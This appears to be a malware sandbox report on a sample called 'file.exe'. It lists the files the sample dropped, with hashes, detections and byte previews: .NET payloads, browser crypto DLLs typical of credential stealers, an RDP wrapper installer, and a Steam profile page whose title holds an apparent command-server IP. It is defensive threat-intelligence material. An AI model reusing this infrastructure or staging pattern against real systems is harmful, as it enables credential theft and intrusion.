SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\userBGIJEGCGDG.exe.log

Download File

Process:	C:\Users\userBGIJEGCGDG.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\userGCAEHDBAAE.exe.log

Download File

Process:	C:\Users\userGCAEHDBAAE.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.6619916056452
Encrypted:	false
SSDEEP:	1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
MD5:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
SHA1:	95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
SHA-256:	1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
SHA-512:	B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r&..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....rM..p(.....{....rM..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5db9e54794_vfkagks[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5dbaca34ac_lfdnsafnds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.39830416696088
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2SN:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFY
MD5:	FFEB8D0F929755F44D4F6846EBA233AC
SHA1:	506D9386AEA703EBCD881C221D331BAAAAC79508
SHA-256:	B7CFED37786114372B96374B1222805C4DF70BB040A4F03E39BB4BB1ACBC672F
SHA-512:	C53F207FBE1D2F41F1FC7000BC6AFA747B36DE5F25C15C8345A5196526895772B31C5B1F060F5BF02362415078BF83881CFDC36F2875F2236751ABAA0E2DB343
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.6619916056452
Encrypted:	false
SSDEEP:	1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
MD5:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
SHA1:	95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
SHA-256:	1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
SHA-512:	B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r&..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....rM..p(.....{....rM..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5db9e54794_vfkagks[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5dbaca34ac_lfdnsafnds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398781054776426
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sp:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPF4
MD5:	E1B10435C6D73B1DFAEDF9C984C9849E
SHA1:	EC078CEC0DC1F8B955FD70599DECA5BBFAC1AD43
SHA-256:	FA700CE664728D3171A089D513AD92C869AB79ACA812739688C5F096D6BCE045
SHA-512:	9F5CEBACE2AF0D2E52C354885184A4A7FA36932CA079050FE78B2365C411DAF8CA10334B8CDBB1432A269643E588EEEB04A51CB2712D3F4D1A8B655DEAB236BE
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Download File

Process:	C:\Users\userBGIJEGCGDG.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1785344
Entropy (8bit):	6.646511331349125
Encrypted:	false
SSDEEP:	24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
MD5:	C213162C86BB943BCDF91B3DF381D2F6
SHA1:	8EC200E2D836354A62F16CDB3EED4BB760165425
SHA-256:	AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
SHA-512:	B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
Malicious:	true
